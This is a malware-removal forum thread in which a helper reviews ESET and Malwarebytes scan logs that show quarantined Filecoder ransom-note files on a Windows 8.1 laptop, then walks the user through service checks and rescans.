sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\cs-cz\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\da-dk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\da-dk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\de-de\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\de-de\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\el-gr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\el-gr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-gb\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-gb\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-us\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-us\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\es-es\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\es-es\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\et-ee\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\et-ee\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fi-fi\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fi-fi\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fr-fr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fr-fr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hr-hr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hr-hr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hu-hu\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hu-hu\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\it-it\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\it-it\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ja-jp\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ja-jp\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ko-kr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ko-kr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lt-lt\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lt-lt\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lv-lv\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lv-lv\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nb-no\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nb-no\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nl-nl\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nl-nl\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pl-pl\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pl-pl\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-br\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-br\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-pt\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-pt\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ro-ro\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ro-ro\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ru-ru\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ru-ru\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sk-sk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sk-sk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sl-si\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sl-si\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sr-latn-rs\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sr-latn-rs\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sv-se\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sv-se\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\tr-tr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\tr-tr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\uk-ua\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\uk-ua\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-cn\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-cn\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-hk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-hk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-tw\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-tw\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\cs-cz\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\cs-cz\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\da-dk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\da-dk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\de-de\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\de-de\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\el-gr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\el-gr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\en-us\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\en-us\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\es-es\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\es-es\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fi-fi\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fi-fi\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\Fonts\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\Fonts\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fr-fr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fr-fr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\hu-hu\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\hu-hu\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\it-it\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\it-it\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ja-jp\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ja-jp\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ko-kr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ko-kr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nb-no\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nb-no\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nl-nl\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nl-nl\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pl-pl\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pl-pl\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-br\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-br\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-pt\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-pt\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ru-ru\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ru-ru\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\sv-se\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\sv-se\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\tr-tr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\tr-tr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-cn\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-cn\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-hk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-hk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-tw\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-tw\how_decrypt.html"

#11
Nevan

Posted 07 September 2015 - 09:48 AM

Trusted Helper

Malware Removal
1,765 posts

Hello again, xander291190.

I've noticed that you ran both MBAM and ESET with default settings and that you stopped MBAM from scanning. It is really important that the procedures are performed the way given. Please perform instructions as they are.

ESET has found some files that seem to be remnants of Filecoder ransomware. It's symptoms are that your files get encrypted and you don't have access to them anymore. Have you had it removed earlier?

Also, perform the following instructions.

Step #1
Services edit

Click Start>type services.msc in the search box and click Enter. A window will appear.
Search for Windows Update, then right-click it and choose Properties.
In a window that appears, change the Startup type to Automatic.
Click OK and restart your system.

Step #2

Farbar Service Scanner

Right click FSS.exe on your desktop and click Run as administrator.
Make sure that all options are checked and click Scan
It will create a log (FSS.txt) on the Desktop.
Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply

Step #3

Malwarebytes Anti-Malware

Launch Malwarebytes Anti-Malware
In Database version section, click Update Now
Once the update is done, click Settings>Detection and Protection
Make sure that all three boxes under Detection Options are checked
Go back to Dashboard and click the big, green Scan Now button.
Wait for Malwarebytes Anti-Malware to finish the scan. DO NOT CANCEL IT!
If the program will detect anything, click Remove Selected. The program might want to reboot the system. Allow it it wants to.
Once the deletion is done (or after reboot), go to History, select Application Logs and click the latest Scan Log.
Click Export, then click Copy to Clipboard.
Paste (CTRL+V) the log into your next reply.

Things that should appear in your next post:

Answer to my question about Filecoder
FSS.txt log content
Malwarebytes Anti-Malware log content

#12
xander291190

Posted 07 September 2015 - 06:15 PM

Member

Topic Starter
Member
13 posts

Hi Nevan,

I'm not really sure what Filecoder is if i'm honest. If it's a program or some sort of file that was on my computer, I wasn't aware of it. Maybe i deleted it without really knowing what it was, sorry I can't really answer the question very well, I don't really recall the file.

Also my apologies, I didn't intentionally cancel the MalwareBytes scan, I left it running while i was away from the laptop, so maybe it cancelled by accident I'm not sure.

Here's the logs:

MalwareBytes:

Malwarebytes Anti-Malware

www.malwarebytes.org

Scan Date: 8/09/2015

Scan Time: 9:09 AM

Logfile: MalwareBytes.txt

Administrator: Yes

Version: 2.1.8.1057

Malware Database: v2015.09.07.04

Rootkit Database: v2015.08.16.01

License: Trial

Malware Protection: Disabled

Malicious Website Protection: Disabled

Self-protection: Disabled

OS: Windows 8.1

CPU: x64

File System: NTFS

User: user

Scan Type: Threat Scan

Result: Completed

Objects Scanned: 339256

Time Elapsed: 29 min, 36 sec

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Enabled

PUM: Enabled

Processes: 0

(No malicious items detected)

Modules: 0

(No malicious items detected)

Registry Keys: 0

(No malicious items detected)

Registry Values: 0

(No malicious items detected)

Registry Data: 0

(No malicious items detected)

Folders: 0

(No malicious items detected)

Files: 0

(No malicious items detected)

Physical Sectors: 0

(No malicious items detected)

Farbar Service Scanner Version: 26-07-2015

Ran by user (administrator) on 08-09-2015 at 10:08:56

Running from "C:\Users\user\Downloads"

Microsoft Windows 8.1 with Bing (X64)

Boot Mode: Normal

****************************************************************

Internet Services:

============

Connection Status:

==============

Localhost is accessible.

LAN connected.

Google IP is accessible.

Google.com is accessible.

Yahoo.com is accessible.

Windows Firewall:

=============

Firewall Disabled Policy:

==================

System Restore:

============

System Restore Policy:

========================

Action Center:

============

Windows Update:

============

wuauserv Service is not running. Checking service configuration:

The start type of wuauserv service is OK.

The ImagePath of wuauserv service is OK.

The ServiceDll of wuauserv service is OK.

Windows Autoupdate Disabled Policy:

============================

Windows Defender:

==============

WinDefend Service is not running. Checking service configuration:

The start type of WinDefend service is OK.

The ImagePath of WinDefend service is OK.

Windows Defender Disabled Policy:

==========================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]

"DisableAntiSpyware"=DWORD:1

Other Services:

==============

File Check:

========

C:\Windows\System32\nsisvc.dll => File is digitally signed

C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed

C:\Windows\System32\dhcpcore.dll => File is digitally signed

C:\Windows\System32\drivers\afd.sys => File is digitally signed

C:\Windows\System32\drivers\tdx.sys => File is digitally signed

C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed

C:\Windows\System32\dnsrslvr.dll => File is digitally signed

C:\Windows\System32\mpssvc.dll => File is digitally signed

